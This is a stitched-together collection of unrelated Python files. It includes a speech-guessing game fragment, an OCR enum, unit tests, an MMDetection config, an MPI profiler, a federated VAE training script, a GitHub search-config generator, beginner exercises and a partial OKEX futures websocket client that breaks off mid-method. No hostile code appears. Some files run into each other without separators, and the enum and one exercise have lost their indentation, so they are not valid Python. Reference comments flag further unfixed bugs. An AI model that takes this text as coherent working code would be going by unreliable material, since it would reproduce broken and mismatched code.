        # if there was an error, stop the game
        if guess["error"]:
            print("ERROR: {}".format(guess["error"]))
            break
        # show the user the transcription
        print("You said: {}".format(guess["transcription"]))
        # determine if guess is correct and if any attempts remain
        guess_is_correct = guess["transcription"].lower() == word.lower()
        user_has_more_attempts = i < NUM_GUESSES - 1
        # determine if the user has won the game
        # if not, repeat the loop if user has more attempts
        # if no attempts left, the user loses the game
        if guess_is_correct:
            # BUG FIX: the string has no "{}" placeholder, so the previous
            # ".format(word)" call was a silent no-op; it has been removed.
            print("Correct! You win!")
            break
        elif user_has_more_attempts:
            print("Incorrect. Try again.\n")
        else:
            print("Sorry, you lose!\nI was thinking of '{}'.".format(word))
            break
|
from enum import IntEnum
class DataSetType(IntEnum):
RAW = 0
FILE = 1
ABBYY = 2
PAGEXML = 3
HDF5 = 4
EXTENDED_PREDICTION = 5
GENERATED_LINE = 6
def __str__(self):
return self.name
@staticmethod
def from_string(s):
try:
return DataSetType[s]
except KeyError:
raise ValueError()
@staticmethod
def files(type):
files_meta = {
DataSetType.RAW: False,
DataSetType.FILE: True,
DataSetType.ABBYY: True,
DataSetType.PAGEXML: True,
DataSetType.EXTENDED_PREDICTION: True,
DataSetType.HDF5: False,
DataSetType.GENERATED_LINE: False,
}
return files_meta[type]
@staticmethod
def gt_extension(type):
return {
DataSetType.RAW: None,
DataSetType.FILE: ".gt.txt",
DataSetType.ABBYY: ".abbyy.xml",
DataSetType.PAGEXML: ".xml",
DataSetType.EXTENDED_PREDICTION: ".json",
DataSetType.HDF5: ".h5",
DataSetType.GENERATED_LINE: None,
}[type]
@staticmethod
def pred_extension(type):
return {
DataSetType.RAW: None,
DataSetType.FILE: ".pred.txt",
DataSetType.ABBYY: ".pred.abbyy.xml",
DataSetType.PAGEXML: ".pred.xml",
DataSetType.EXTENDED_PREDICTION: ".json",
DataSetType.HDF5: ".pred.h5",
DataSetType.GENERATED_LINE: None,
}[type]
|
#!/usr/bin/python
import pypresenter.slide
# NOTE(review): `import pypresenter.slide` binds the *module* — inheriting
# from a module raises TypeError at class creation. The intended base is
# presumably the `slide` class inside it (pypresenter.slide.slide); confirm
# against the pypresenter package.
class slide3(pypresenter.slide):
    """Slide 3: introduces the pyconfig DSL, centered on screen."""
    def __init__(self):
        # NOTE(review): super(self.__class__, ...) recurses infinitely if this
        # class is ever subclassed; prefer super(slide3, self).
        super(self.__class__, self).__init__('center')
    def content(self, window=None):
        # The slide's text; `window` is accepted but unused here.
        return 'pyconfig DSL (Domain Specific Language)'
    def draw(self, window):
        # Delegate rendering to the base class's text helper.
        self.displayText(window, self.content())
#!/usr/bin/env python
# -*- coding: utf-8 -*-import unittest
import unittest
import json
from signature import MTSigner
class TestSignature(unittest.TestCase):
    """Verify MTSigner against the reference vectors in ../sample.txt.

    The sample file is JSON with a signing 'key' and a list of 'maps',
    each holding a 'text' and its expected 'sign'.
    """
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def testSign(self):
        # BUG FIX: the file handle was opened/closed by hand (and leaked on a
        # read error); use a context manager. Also stop shadowing builtin `str`.
        with open("../sample.txt", "r") as fo:
            text = fo.read()
        sample = json.loads(text)
        signer = MTSigner(sample['key'].encode('utf-8'))
        for _map in sample['maps']:
            self.assertEqual(_map['sign'], signer.sign(_map['text'].encode('utf-8')))
|
# Copyright 2021 aaaaaaaalesha <sks2311211@mail.ru>
import unittest
from src.stack import Stack
class StackTestCase(unittest.TestCase):
    """Unit tests for src.stack.Stack (empty/push/pop/top/clear/str)."""
    def test_stack_empty(self):
        """empty() reflects pushes and clear(); __str__ shows LIFO order."""
        stack = Stack()
        self.assertTrue(stack.empty())
        stack.push(1)
        self.assertFalse(stack.empty())
        stack.push(2)
        # Idiom fix: call str(stack) instead of stack.__str__().
        self.assertEqual(str(stack), "Stack[2, 1]")
        self.assertFalse(stack.empty())
        stack.clear()
        self.assertTrue(stack.empty())
    def test_stack_pop_top(self):
        """top() peeks without removing; pop() returns items in LIFO order."""
        stack = Stack()
        self.assertTrue(stack.empty())
        stack.push(1)
        self.assertFalse(stack.empty())
        self.assertEqual(stack.top(), 1)
        stack.push(2)
        self.assertEqual(stack.top(), 2)
        stack.push(3)
        self.assertEqual(stack.top(), 3)
        # Idiom fix: call str(stack) instead of stack.__str__().
        self.assertEqual(str(stack), "Stack[3, 2, 1]")
        self.assertEqual(stack.pop(), 3)
        self.assertEqual(stack.pop(), 2)
        self.assertEqual(stack.pop(), 1)
        self.assertTrue(stack.empty())
# Allow running this test module directly via `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
# MMDetection config: GFL-style detector (ResNet-50 + FPN) trained with
# knowledge distillation (LD/KD/IM losses) on COCO, derived from the
# r18<-r101 LD baseline below.
_base_ = ['../ld/ld_r18_gflv1_r101_fpn_coco_1x.py']
model = dict(
    pretrained='torchvision://resnet50',
    output_feature=True,
    backbone=dict(
        type='ResNet',
        depth=50,
        num_stages=4,
        out_indices=(0, 1, 2, 3),
        # Freeze stem + stage 1; BN layers stay in eval mode during training.
        frozen_stages=1,
        norm_cfg=dict(type='BN', requires_grad=True),
        norm_eval=True,
        style='pytorch'),
    neck=dict(
        type='FPN',
        in_channels=[256, 512, 1024, 2048],
        out_channels=256,
        start_level=1,
        add_extra_convs='on_output',
        num_outs=5),
    bbox_head=dict(
        type='IMHead',
        num_classes=80,
        in_channels=256,
        stacked_convs=4,
        feat_channels=256,
        # Anchor-free style: one square anchor scale per FPN level.
        anchor_generator=dict(
            type='AnchorGenerator',
            ratios=[1.0],
            octave_base_scale=8,
            scales_per_octave=1,
            strides=[8, 16, 32, 64, 128]),
        loss_cls=dict(
            type='QualityFocalLoss',
            use_sigmoid=True,
            beta=2.0,
            loss_weight=1.0),
        # DFL disabled (weight 0); distillation terms LD/KD/IM carry the signal.
        loss_dfl=dict(type='DistributionFocalLoss', loss_weight=0),
        loss_ld=dict(
            type='KnowledgeDistillationKLDivLoss', loss_weight=0.25, T=10),
        loss_kd=dict(
            type='KnowledgeDistillationKLDivLoss', loss_weight=10, T=2),
        loss_im=dict(type='IMLoss', loss_weight=2.0),
        reg_max=16,
        loss_bbox=dict(type='GIoULoss', loss_weight=2.0)),
    )
data = dict(
    samples_per_gpu=2,
    workers_per_gpu=2,
)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
|
from mpi4py import MPI
from time import perf_counter as gettime
import numpy
import sys
from contextlib import contextmanager
class Profiler:
    """Hierarchical section timer for MPI-parallel programs.

    Sections are opened/closed with starttimer()/endtimer() and may nest.
    Each closed section is stored as [level, name, ncalls, total_time,
    child_time]. Optional barriers synchronize ranks around the timer
    calls so the measured intervals are comparable across processes.
    """
    def resettime(self):
        """Reset the reference timestamp for the profile."""
        self.t0 = gettime()
    def setbarrier(self, inoption):
        """Enable (True) or disable (False) barriers around timer calls."""
        self.timerbarrier = inoption
    def setmpicommunicator(self, inmpicommunicator):
        """Attach a communicator (needs Get_rank/Get_size/Barrier/Reduce/Bcast)."""
        self.mpicommobj = inmpicommunicator
        self.myrank = self.mpicommobj.Get_rank()
        self.numproc = self.mpicommobj.Get_size()
    def __init__(self, inmpicommunicator):
        self.setmpicommunicator(inmpicommunicator)
        self.resettime()
        self.opensections = []   # stack of currently open sections
        self.sectiontimes = []   # completed sections, in closing order
        self.timerbarrier = True
    def starttimer(self, sectionname="MAIN"):
        """Open a (possibly nested) timing section."""
        if sectionname == "MAIN":
            self.resettime()
        numopensections = len(self.opensections)
        # [nesting level, name, call count, start time (later: elapsed), child time]
        opensection = [numopensections, sectionname, 1, 0, 0]
        if self.timerbarrier:
            self.mpicommobj.Barrier()
        opensection[3] = gettime()
        self.opensections.append(opensection)
    def endtimer(self, sectionname="MAIN"):
        """Close the innermost open section; its name must match.

        :raises RuntimeError: on no open section or a name mismatch.
        """
        numopensections = len(self.opensections)
        if numopensections <= 0:
            print(
                "Error: EndTimer(",
                sectionname,
                ") called with no matching StartTimer.",
            )
            # Was an intentional `1 / 0` crash; raise a descriptive error.
            raise RuntimeError("EndTimer called with no matching StartTimer")
        # Capture the stop time *before* the barrier so time spent waiting
        # for other ranks is not billed to this section.
        sectiontime = gettime()
        if self.timerbarrier:
            self.mpicommobj.Barrier()
        opensectionindex = numopensections - 1
        if sectionname != self.opensections[opensectionindex][1]:
            print(
                "SectionName: Expected(",
                self.opensections[opensectionindex][1],
                ")",
                ", Got(",
                sectionname,
                ")",
            )
            # Was an intentional `1 / 0` crash; raise a descriptive error.
            raise RuntimeError("EndTimer section-name mismatch")
        opensection = self.opensections.pop()
        sectiontime = sectiontime - opensection[3]
        opensection[3] = sectiontime
        opensectionindex = opensectionindex - 1
        # Update parent's sub-timers
        if opensectionindex >= 0:
            self.opensections[opensectionindex][4] += sectiontime
        # Update section if it exists
        numsections = len(self.sectiontimes)
        match = False
        for i in range(numsections):
            if self.sectiontimes[i][1] == sectionname:
                existingsection = self.sectiontimes[i]
                existingsection[2] += 1
                existingsection[3] += sectiontime
                existingsection[4] += opensection[4]
                match = True
                break
        # Create new section if it didn't exist
        if not match:
            self.sectiontimes.append(opensection)
    @contextmanager
    def contexttimer(self, contextname=""):
        """Time a block: ``with profiler.contexttimer("name"): ...``"""
        self.starttimer(contextname)
        yield contextname
        self.endtimer(contextname)
    def writeserialprofile(self, filename=""):
        """Write this rank's sections (shallowest level first) to *filename*,
        or to stdout when *filename* is empty."""
        # copy the timers to avoid destructing the list when printing
        sectiontimers = list(self.sectiontimes)
        numsections = len(sectiontimers)
        numcurrentsections = numsections
        minlevel = 0
        profilefile = sys.stdout
        if filename != "":
            profilefile = open(filename, "w")
        if numcurrentsections > 0:
            print(
                "# SectionName NumCalls TotalTime ChildTime",
                file=profilefile,
            )
        while numcurrentsections > 0:
            match = False
            for i in range(numcurrentsections):
                if sectiontimers[i][0] == minlevel:
                    # BUG FIX: was `sectiontimers.pop()`, which removed (and
                    # printed) the *last* entry instead of the matched one,
                    # scrambling the level-ordered output.
                    sectiontimer = sectiontimers.pop(i)
                    # print out SectionName NumCalls TotalTime ChildTime
                    print(
                        sectiontimer[1],
                        sectiontimer[2],
                        sectiontimer[3],
                        sectiontimer[4],
                        file=profilefile,
                    )
                    match = True
                    break
            if match is False:
                minlevel += 1
            numcurrentsections = len(sectiontimers)
        if filename != "":
            profilefile.close()
    # WriteParallelProfile is a collective call, must be called on all procs
    def writeparallelprofile(self, filename=""):
        """Reduce per-section times across ranks and write min/max/mean
        on rank 0 (collective call).

        :raises RuntimeError: when ranks disagree on the number of sections.
        """
        sectiontimers = list(self.sectiontimes)
        numsections = len(sectiontimers)
        mynumsections = numpy.zeros(1, dtype=int)
        mycheck = numpy.zeros(1, dtype=int)
        self.mpicommobj.Barrier()
        numproc = self.mpicommobj.Get_size()
        if self.myrank == 0:
            mynumsections[0] = numsections
        self.mpicommobj.Bcast(mynumsections, root=0)
        # Sanity check: every rank must have recorded the same sections.
        if numsections == mynumsections[0]:
            mynumsections[0] = 0
        else:
            mynumsections[0] = 1
            print(
                "(",
                self.myrank,
                "): ",
                numsections,
                " != ",
                mynumsections[0],
            )
            # Was an intentional `1 / 0` crash; raise a descriptive error.
            raise RuntimeError("Section count differs from rank 0")
        self.mpicommobj.Reduce(mynumsections, mycheck, MPI.MAX, 0)
        if mycheck > 0:
            print(
                "ReduceTimers:Error: Disparate number of sections ",
                "across processors.",
            )
            # Was an intentional `1 / 0` crash; raise a descriptive error.
            raise RuntimeError("Disparate number of sections across processors")
        mysectiontimes = numpy.zeros(numsections, dtype="float")
        mintimes = numpy.zeros(numsections, dtype="float")
        maxtimes = numpy.zeros(numsections, dtype="float")
        sumtimes = numpy.zeros(numsections, dtype="float")
        for i in range(numsections):
            mysectiontimes[i] = sectiontimers[i][3]
        self.mpicommobj.Reduce(mysectiontimes, mintimes, MPI.MIN, 0)
        self.mpicommobj.Reduce(mysectiontimes, maxtimes, MPI.MAX, 0)
        self.mpicommobj.Reduce(mysectiontimes, sumtimes, MPI.SUM, 0)
        if self.myrank == 0:
            profilefile = sys.stdout
            if filename != "":
                profilefile = open(filename, "w")
            print("# NumProcs: ", numproc, file=profilefile)
            print(
                "# SectionName MinTime MaxTime MeanTime",
                file=profilefile,
            )
            for i in range(numsections):
                sectiontime = sectiontimers[i]
                print(
                    sectiontime[1],
                    mintimes[i],
                    maxtimes[i],
                    sumtimes[i] / float(self.numproc),
                    file=profilefile,
                )
            if filename != "":
                profilefile.close()
        self.mpicommobj.Barrier()
    def makeparallelfilename(self, rootname=""):
        """Build an output name like "<root>_ParTimes_<numproc>"."""
        myrootname = rootname
        if myrootname == "":
            myrootname = "Profiler"
        numproc = self.mpicommobj.Get_size()
        profilefilename = myrootname + "_ParTimes_" + str(numproc)
        return profilefilename
|
import torch
import torchvision
import torchvision.transforms as transforms
import math
import time
# How many models (==slaves)
K=10
# train K models by Federated learning
# each iteration over a subset of parameters: 1) average 2) pass back average to slaves 3) SGD step
# initialize with pre-trained models (better to use common initialization)
# loop order: loop 0: parameters/layers {
#  loop 1 : { averaging (part of the model)
#   loop 2: { epochs/databatches { train; } } } }
# repeat this Nloop times
torch.manual_seed(69)
# minibatch size
default_batch=128 # no. of batches per model is (50000/K)/default_batch
Nloop=12 # how many loops over the whole network
Nepoch=1 # how many epochs?
Nadmm=3 # how many FA iterations
load_model=False
init_model=True
save_model=True
check_results=True
# if input is biased, each 1/K training data will have
# (slightly) different normalization. Otherwise, same normalization
biased_input=True
# (try to) use a GPU for computation?
use_cuda=True
if use_cuda and torch.cuda.is_available():
    mydevice=torch.device('cuda')
else:
    mydevice=torch.device('cpu')
# split 50000 training data into K subsets (last one will be smaller if K is not a divisor)
K_perslave=math.floor((50000+K-1)/K)
subsets_dict={}
for ck in range(K):
    # NOTE(review): range()'s end is already exclusive, so the extra "-1"
    # appears to drop the last sample of every subset — confirm intent.
    if K_perslave*(ck+1)-1 <= 50000:
        subsets_dict[ck]=range(K_perslave*ck,K_perslave*(ck+1)-1)
    else:
        subsets_dict[ck]=range(K_perslave*ck,50000)
transforms_dict={}
for ck in range(K):
    if biased_input:
        # slightly different normalization for each subset
        transforms_dict[ck]=transforms.Compose(
            [transforms.ToTensor(),
             transforms.Normalize((0.5+ck/100,0.5-ck/100,0.5),(0.5+ck/100,0.5-ck/100,0.5))])
    else:
        # same normalization for all training data
        transforms_dict[ck]=transforms.Compose(
            [transforms.ToTensor(),
             transforms.Normalize((0.5,0.5,0.5),(0.5,0.5,0.5))])
trainset_dict={}
testset_dict={}
trainloader_dict={}
testloader_dict={}
for ck in range(K):
    # Each slave sees only its own subset via SubsetRandomSampler.
    trainset_dict[ck]=torchvision.datasets.CIFAR10(root='./torchdata', train=True,
        download=True, transform=transforms_dict[ck])
    testset_dict[ck]=torchvision.datasets.CIFAR10(root='./torchdata', train=False,
        download=True, transform=transforms_dict[ck])
    trainloader_dict[ck] = torch.utils.data.DataLoader(trainset_dict[ck], batch_size=default_batch, shuffle=False, sampler=torch.utils.data.SubsetRandomSampler(subsets_dict[ck]),num_workers=1)
    testloader_dict[ck]=torch.utils.data.DataLoader(testset_dict[ck], batch_size=default_batch,
        shuffle=False, num_workers=0)
import numpy as np
# define variational autoencoder
from simple_models import *
net_dict={}
for ck in range(K):
    net_dict[ck]=AutoEncoderCNN().to(mydevice)
    # update from saved models
    if load_model:
        checkpoint=torch.load('./s'+str(ck)+'.model',map_location=mydevice)
        net_dict[ck].load_state_dict(checkpoint['model_state_dict'])
        net_dict[ck].train()
########################################################################### helper functions
from simple_utils import *
# Shared reconstruction criterion used by loss_function (summed MSE).
reconstruction_function = nn.MSELoss(reduction='sum')
def loss_function(recon_x, x, mu, logvar):
    """VAE objective: summed-MSE reconstruction term plus KL divergence.

    recon_x: generated image
    x      : original image
    mu     : latent z mean
    logvar : latent z log variance, log(sigma^2)
    """
    reconstruction_term = reconstruction_function(recon_x, x)
    # KL(q||p) = -0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
    kl_term = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
    #print('%f %f'%(reconstruction_term,kl_term))
    return reconstruction_term + kl_term
##############################################################################################
if init_model:
    for ck in range(K):
        # note: use same seed for random number generation
        torch.manual_seed(0)
        net_dict[ck].apply(init_weights)
# get layer ids in given order 0..L-1 for selective training
np.random.seed(0)# get same list
Li=net_dict[0].train_order_block_ids()
L=len(Li)
import torch.optim as optim
############### loop 00 (over the full net)
for nloop in range(Nloop):
    ############ loop 0 (over layers of the network)
    for ci in range(L):
        # Only the ci-th block of layers is trainable in this pass.
        for ck in range(K):
            unfreeze_one_layer(net_dict[ck],ci)
        trainable=filter(lambda p: p.requires_grad, net_dict[0].parameters())
        params_vec1=torch.cat([x.view(-1) for x in list(trainable)])
        # number of parameters trained
        N=params_vec1.numel()
        # z: the federated average of the currently trainable parameters.
        z=torch.empty(N,dtype=torch.float,requires_grad=False).to(mydevice)
        z.fill_(0.0)
        # Fresh optimizers per block so Adam state matches the unfrozen params.
        opt_dict={}
        for ck in range(K):
            opt_dict[ck]=optim.Adam(filter(lambda p: p.requires_grad, net_dict[ck].parameters()),lr=0.001)
        ############# loop 1 (Federated avaraging for subset of model)
        for nadmm in range(Nadmm):
            ##### loop 2 (data) (all network updates are done per epoch, because K is large
            ##### and data per host is assumed to be small)
            for epoch in range(Nepoch):
                #### loop 3 (models)
                for ck in range(K):
                    running_loss=0.0
                    for i,(images, _) in enumerate(trainloader_dict[ck],0): # ignore labels
                        # get the inputs
                        x=Variable(images).to(mydevice)
                        def closure1():
                            # Optimizer closure: forward, zero-grad, backward.
                            out, mu, logvar = net_dict[ck](x)
                            if torch.is_grad_enabled():
                                opt_dict[ck].zero_grad()
                            loss=loss_function(out,x,mu,logvar)
                            if loss.requires_grad:
                                loss.backward()
                            return loss
                        # ADMM step 1
                        opt_dict[ck].step(closure1)
                        # only for diagnostics
                        out, mu, logvar= net_dict[ck](x)
                        loss1=loss_function(out,x,mu,logvar).data.item()
                        running_loss +=float(loss1)
                        print('model=%d block=[%d,%d] %d(%d) minibatch=%d epoch=%d loss %e'%(ck,Li[ci][0],Li[ci][1],nloop,N,i,epoch,loss1))
                        del x,loss1,out,mu,logvar
                # Federated averaging
                x_dict={}
                for ck in range(K):
                    x_dict[ck]=get_trainable_values(net_dict[ck],mydevice)
                znew=torch.zeros(x_dict[0].shape).to(mydevice)
                for ck in range(K):
                    znew=znew+x_dict[ck]
                znew=znew/K
                # Dual residual: how much the consensus vector moved this round.
                dual_residual=torch.norm(z-znew).item()/N # per parameter
                print('dual (epoch=%d,loop=%d,block=[%d,%d],avg=%d)=%e'%(epoch,nloop,Li[ci][0],Li[ci][1],nadmm,dual_residual))
                z=znew
                # Push the averaged parameters back to every slave.
                for ck in range(K):
                    put_trainable_values(net_dict[ck],z)
print('Finished Training')
if save_model:
    # NOTE(review): `epoch` and `running_loss` here are whatever the last
    # loop iteration left behind (last model's loss) — confirm that is the
    # intended checkpoint metadata.
    for ck in range(K):
        torch.save({
            'model_state_dict':net_dict[ck].state_dict(),
            'epoch':epoch,
            'optimizer_state_dict':opt_dict[ck].state_dict(),
            'running_loss':running_loss,
        },'./s'+str(ck)+'.model')
import os
import sys
import yaml
# Build a code-search configuration (GitHub token + per-repo search queries
# with a minimum-star threshold) and dump it as YAML to stdout.
repos = {}
config = {
    "token": os.environ["GITHUB_TOKEN"],
    "repos": repos,
}
# Hand-written entries.
repos["nightly.link"] = {
    "queries": [("https://nightly.link", "-path:.github/workflows")],
    "min_stars": 8,
}
repos["nightly.link in workflows"] = {
    "queries": [("https://nightly.link", "path:.github/workflows")],
    "min_stars": 5,
}
# GitHub Actions referenced from other repos' workflow files.
for name, min_stars in [
    ("install-crystal", 4),
    ("find-latest-tag", 13),
]:
    queries = [
        (f"oprypin/{name}", "path:.github/workflows language:yaml"),
    ]
    repos[name] = {"queries": queries, "min_stars": min_stars}
# MkDocs plugins: matched either in mkdocs.yml plugin lists or requirements.txt.
# Entries may carry extra query terms between the plugin name and min_stars.
for name, plugname, *query, min_stars in [
    ("mkdocstrings-crystal", "mkdocstrings", "default_handler", "crystal", 0),
    ("mkdocs-section-index", "section-index", 2),
    ("mkdocs-literate-nav", "literate-nav", 0),
    ("mkdocs-gen-files", "gen-files", 0),
    ("mkdocs-same-dir", "same-dir", 0),
    ("mkdocstrings", "mkdocstrings", "-crystal", 10),
    ("mkdocs-autorefs", "autorefs", 3),
]:
    query = query or [""]
    query[-1] += " filename:mkdocs.yml"
    queries = [
        ("plugins", "- " + plugname, *query),
        (name, "filename:requirements.txt"),
    ]
    # These two are dependencies of other packages, so requirements.txt
    # mentions would be mostly indirect — drop that query.
    if name in ["mkdocstrings", "mkdocs-autorefs"]:
        del queries[-1]
    repos[name] = {"queries": queries, "min_stars": min_stars}
# Crystal shards: matched in shard.yml and (optionally) require statements.
for name, require, min_stars in [
    ("crsfml", "crsfml", 1),
    ("crystal-chipmunk", "chipmunk", 1),
    ("crystal-imgui", None, 0),
]:
    queries = [(f"oprypin/{name}", "filename:shard.yml")]
    if require:
        queries += [(f'require "{require}"', "language:crystal")]
    repos[name] = {"queries": queries, "min_stars": min_stars}
# Python packages: matched by import name or requirements.txt.
for name, imprt, min_stars in [
    ("pytest-golden", "pytest_golden", 0),
]:
    queries = [
        (imprt, "language:python"),
        (name, "filename:requirements.txt"),
    ]
    repos[name] = {"queries": queries, "min_stars": min_stars}
yaml.safe_dump(config, sys.stdout, sort_keys=False)
|
# -*- coding: utf-8 -*-
# Store a person’s name in a variable, and print a message
# to that person. Your message should be simple, such as, “Hello Eric, would you like to learn some Python today?”
# Greet the named person with an invitation to learn Python.
name = 'Ross'
print(f'Hello {name}, would you like to learn some Python today?')
"""
Enunciado
Faça um programa que peça para o usuário digitar um número n e imprima uma lista com todos os números de 0 a n-1.
Exemplo: se o usuário digitar 5, o programa deve imprimir [0, 1, 2, 3, 4]
"""
lista = []
numero = int(input("Digite um número inteiro: "))
c = 0
while c < numero:
lista.append(c)
c = c + 1
print(lista) |
import sys
sys.path.append('../')
sys.path.append('../../')
from dquant.util import Util
import os
import asyncio, collections
import json, time
import logging
import hashlib
import queue
from asyncio import AbstractEventLoop
from dquant.config import cfg
from dquant.constants import Constants
from dquant.markets.market import Market
from dquant.strategy.trigger import DepthIndexTrigger
logger = logging.getLogger(__name__)
class OkexFutureWs( Market):
    """Websocket client for OKEX USD-margined futures contracts.

    An asyncio event loop (driven by ``run``, typically in a background
    thread) keeps the connection alive, dispatches inbound messages to the
    handlers registered in ``self.methods``, and flushes the outbound queue
    ``self.q``.  Synchronous callers (``long``/``short``/``getOrder``/...)
    enqueue a request and busy-wait in ``update`` until the matching
    handler has stored the response and set the corresponding flag.
    """
    def __init__(self, meta_code,loop):
        """
        :param meta_code: contract key such as 'btc_usd_this_week'
            (see ``parse_meta`` for the supported values).
        :param loop: asyncio event loop the websocket coroutines run on.
        """
        self.contract_type = None
        self.symbol = None
        market_currency, base_currency, symbol, contract_type = self.parse_meta(meta_code)
        super().__init__(market_currency, base_currency, meta_code, cfg.get_float_config(Constants.OKEX_FUTURE_FEE))
        self.apikey = cfg.get_config(Constants.OKEX_FUTURE_APIKEY)
        self.apisec = cfg.get_config(Constants.OKEX_FUTURE_APISEC)
        self.base_url = Constants.OKEX_FUTURE_WS_BASE
        self.okex_id = cfg.get_config(Constants.OKEX_FUTURE_ID)
        self.strategy_id = cfg.get_config(Constants.OKEX_FUTURE_STRATEGY_ID)
        self.fee_rate_taker = cfg.get_float_config(Constants.OKEX_FUTURE_FEE_TAKER)
        self.contract_type = contract_type
        self.symbol = symbol
        self.timeout = Constants.OK_HTTP_TIMEOUT
        self.name = "OKEXFuture"
        # NOTE(review): this overwrites the strategy_id loaded from config a
        # few lines above -- confirm which value is intended.
        self.strategy_id = 0
        self.q = asyncio.Queue()  # outbound websocket messages
        self.q_order_result = queue.Queue()  # order-update events for consumers
        # self.q_trigger = queue.Queue()
        self.position = {}
        self.websocket = None
        # Latest market snapshots, filled in by the update_* handlers.
        self.depth = None
        self.ticker = None
        self.trades = None
        self.index_price = None
        self.trade = None
        self.hist_lenth = 10  # max entries kept per side in self.hist
        self.order_type = {1: 'long', 2: 'short', 3: 'close_long', 4: 'close_short'}
        self.unique_active_orders = {}
        # self.order_result_required = False
        # self.q_order_result = queue.Queue()
        self.depth_channel = "ok_sub_future_{}_depth_{}_usd_20".format(self.market_currency, self.contract_type)
        self.ticker_channel = 'ok_sub_futureusd_{}_ticker_{}'.format(self.market_currency, self.contract_type)
        self.trades_channel = 'ok_sub_futureusd_{}_trade_{}'.format(self.market_currency, self.contract_type)
        self.index_price_channel = 'ok_sub_futureusd_{}_index'.format(self.market_currency)
        # Per-side order history, plus 'delete' for cancelled orders.
        self.hist={'delete': collections.OrderedDict()}
        for _type_num, _type in self.order_type.items():
            self.hist[_type] = collections.OrderedDict()
        # self.lock = threading.Lock()
        self.update_flags = {"depth": False}
        self.loop = loop # type: AbstractEventLoop
        self.static_methods_register()
    # Subscribe to the market-data channels and log in.
    async def sub_channel(self):
        # The currency placeholder in the channel names is e.g. btc or ltc.
        # sub depth
        # channel = "ok_sub_future_btc_depth_this_week_usd"
        message = [str({'event': 'addChannel', 'channel': self.depth_channel}),
                   self.build_message(channel=Constants.OKEX_FUTURE_LOGIN, event='login'),
                   str({'event': 'addChannel', 'channel': self.ticker_channel}),
                   str({'event': 'addChannel', 'channel': self.trades_channel}),
                   str({'event':'addChannel','channel': self.index_price_channel})
                   ]
        for m in message:
            await self.websocket.send(m)
    # Normalize a raw websocket depth payload into sorted price levels.
    def okex_depth_format(self, res, flag):
        result_list = []
        for ticker in res[flag]: result_list.append({
            'price': float(ticker[0]),
            'amount': float(ticker[1])
        })
        if flag == "asks":  # asks: ascending by price
            result_list.sort(key=lambda x: x['price'])
        else:  # bids: descending by price
            result_list.sort(key=lambda x: x['price'], reverse=True)
        return result_list
    def static_methods_register(self):
        """Register the always-on message handlers."""
        self.methods[self.depth_channel] = self.update_depth
        self.methods[Constants.OKEX_FUTURE_LOGIN] = self.login
        # handlers for order/position updates pushed by the server
        self.methods[Constants.OKEX_FUTURE_SUB_TRADES] = self.sub_trades
        self.methods[Constants.OKEX_FUTURE_SUB_POSITIONS] = self.sub_position
        self.methods[self.index_price_channel] = self.update_index_price
    def register_callbacks(self):
        """Register the request/response handlers used while update() waits."""
        self.methods[self.depth_channel] = self.update_depth
        self.methods[self.ticker_channel] = self.update_ticker
        self.methods[self.trades_channel] = self.update_trades
        self.methods[self.index_price_channel] = self.update_index_price
        self.methods[Constants.OKEX_FUTURE_LOGIN] = self.login
        self.methods[Constants.OKEX_FUTURE_TRADE_WS] = self.update_trade
        self.methods[Constants.OKEX_FUTURE_DELETE_ORDER_WS] = self.update_trade
        self.methods[Constants.OKEX_FUTURE_GET_ORDER_WS] = self.update_get_order
        self.methods[Constants.OKEX_FUTURE_USERINFO_WS] = self.update_get_account
    def remove_callbacks(self):
        """Undo register_callbacks.

        NOTE(review): this also deletes the LOGIN handler that
        static_methods_register installed -- confirm that is intended.
        """
        # del self.methods[self.depth_channel]
        del self.methods[Constants.OKEX_FUTURE_LOGIN]
        del self.methods[Constants.OKEX_FUTURE_TRADE_WS]
        del self.methods[Constants.OKEX_FUTURE_DELETE_ORDER_WS]
        del self.methods[Constants.OKEX_FUTURE_GET_ORDER_WS]
        del self.methods[Constants.OKEX_FUTURE_USERINFO_WS]
    def getDepth(self):
        """Block until a fresh order book snapshot arrives, then return it."""
        self.update({"depth": False})
        return self.depth
    def get_ticker(self):
        """Block until a fresh ticker arrives, then return it."""
        self.update({'ticker': False})
        return self.ticker
    def get_trades(self):
        """Block until a fresh public-trades batch arrives, then return it."""
        self.update({'trades': False})
        return self.trades
    def get_index_price(self):
        """Block until a fresh index price arrives, then return it."""
        self.update({'index_price': False})
        return self.index_price
    async def sub_position(self, data):
        """Handle a pushed position update and cache hold amounts."""
        # print(data)
        symbol = data[0]['data']['symbol']
        for side in data[0]['data']['positions']:
            # NOTE(review): self.contract_type is a string like 'this_week',
            # so indexing it with side['position'] yields a single character.
            # This looks like it was meant to be a position-name mapping
            # (cf. self.order_type) -- confirm against the API payload.
            position = self.contract_type[side['position']]
            key = symbol + '_' + position + '_position'
            hold_amount = side['hold_amount']
            self.position[key] = hold_amount
    async def sub_trades(self, sub_trades):
        '''
        Handle a pushed private order update.

        Publishes fill progress to ``q_order_result``, persists completed
        orders via ``Util.build_order_store`` onto ``q_orders``, and records
        them in ``self.hist`` (bounded by ``hist_lenth``).

        :param sub_trades: [{'data': {'orderid': ..., 'status': ...,
            'amount': ..., 'deal_amount': ..., ...}}].  The API docs mention
            both 'orderid' and 'order_id'; actual responses only carry
            'orderid'.
        '''
        # print('sub_trades', sub_trades)
        logger.info("sub_trades: %s" % sub_trades)
        order_id = sub_trades[0]["data"]['orderid']
        price = sub_trades[0]["data"]['price']
        price_avg = sub_trades[0]["data"]['price_avg']
        status = sub_trades[0]["data"]['status']
        amount = sub_trades[0]["data"]['amount']
        deal_amount = sub_trades[0]["data"]['deal_amount']
        trade_pair = sub_trades[0]["data"]['contract_name'] + '_' + sub_trades[0]["data"]['contract_type']
        order_time = sub_trades[0]["data"]['create_date']
        side = self.order_type[sub_trades[0]["data"]['type']]
        # account_id = sub_trades[0]["data"]['user_id']
        # status 1/2: partially filled or fully filled
        if status == 2 or status == 1:
            if order_id in self.unique_active_orders:
                last_amount_filled = self.unique_active_orders[order_id]['amount_filled']
                # skip stale/duplicate updates that do not advance the fill
                if deal_amount <= last_amount_filled:
                    return
            message = {'order_id': order_id,
                       'amount_orig': amount,
                       'amount_filled': deal_amount,
                       'message_type': 'order update',
                       'side': side}
            self.unique_active_orders[order_id] = message
